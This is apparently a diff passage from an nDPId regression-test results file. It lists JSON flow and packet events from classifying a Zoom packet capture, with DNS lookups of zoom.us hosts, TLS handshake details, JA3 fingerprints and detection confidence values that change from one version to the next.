{"query":"zoomfr85zc.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"213.244.140.85"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470769,"flow_last_seen":1569520470769,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470769,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1569520470769,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470769,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGFlHAqAF11fSMVdZVAbvq+zZHAAAAALAC\/\/8TBgAAAgQFtAEDAwUBAQgKJZzgnwAAAAAEAgAA"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1569520470775,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520470775,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGIyLVE5BpwKgBdQG71lPrn+6AoN5dTqASqbAo0wAAAgQFrAQCCAp4fR7ZJZzghQEDAww="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1569520470775,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470775,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGEyrAqAF11ROQadZTAbug3l1O65\/ugYAQECzxAQAAAQEICiWc4KR4fR7Z"} -00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470742,"flow_last_seen":1569520470775,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470775,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470742,"flow_last_seen":1569520470775,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470775,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1569520470776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1569520470776,"pkt":"KDc3AG3IEBMx8Tl2CABFAABQ61QAADcRFILAqAEBwKgBdQA14s8APF0wRhSBgAABAAEAAAAACnpvb21mcjg0emMEem9vbQJ1cwAAAQABwAwAAQABAAABLAAE1fSMVA=="} -00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":168,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520470742,"flow_last_seen":1569520470776,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520470776,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr84zc.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"213.244.140.84"}} +00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":168,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520470742,"flow_last_seen":1569520470776,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520470776,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr84zc.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"213.244.140.84"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":169,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470776,"flow_last_seen":1569520470776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470776,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1569520470776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470776,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGFlLAqAF11fSMVNZWAbv57BLmAAAAALAC\/\/8ncAAAAgQFtAEDAwUBAQgKJZzgpQAAAAAEAgAA"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1569520470787,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520470787,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGIyPVE5BowKgBdQG71lTDwlhoC7yJ3KASqbBbBgAAAgQFrAQCCAp7WhBHJZzgkQEDAww="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1569520470787,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470787,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGEyvAqAF11ROQaNZUAbsLvIncw8JYaYAQECwjNgAAAQEICiWc4K97WhBH"} -00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470755,"flow_last_seen":1569520470787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470787,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470755,"flow_last_seen":1569520470787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470787,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1569520470790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520470790,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGI1XV9IxVwKgBdQG71lXIKlM86vs2SKASqbDi9AAAAgQFrAQCCAp4gwNrJZzgnwEDAww="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1569520470790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470790,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFl3AqAF11fSMVdZVAbvq+zZIyCpTPYAQECyrLwAAAQEICiWc4LJ4gwNr"} -00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470769,"flow_last_seen":1569520470790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470790,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470769,"flow_last_seen":1569520470790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470790,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1569520470801,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520470801,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGI1bV9IxUwKgBdQG71lYtiv8U+ewS56ASqbDdrgAAAgQFrAQCCAp8tQexJZzgpQEDAww="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1569520470801,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470801,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFl7AqAF11fSMVNZWAbv57BLnLYr\/FYAQECyl5QAAAQEICiWc4Lx8tQex"} -00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470776,"flow_last_seen":1569520470801,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470801,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470742,"flow_last_seen":1569520470810,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470810,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470769,"flow_last_seen":1569520470814,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470814,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":192,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470742,"flow_last_seen":1569520470820,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470820,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":195,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470755,"flow_last_seen":1569520470822,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470822,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01346{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":200,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470769,"flow_last_seen":1569520470822,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470822,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":204,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470776,"flow_last_seen":1569520470828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470828,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":209,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470755,"flow_last_seen":1569520470829,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470829,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} -01346{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":212,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470776,"flow_last_seen":1569520470837,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470837,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470776,"flow_last_seen":1569520470801,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470801,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470742,"flow_last_seen":1569520470810,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470810,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 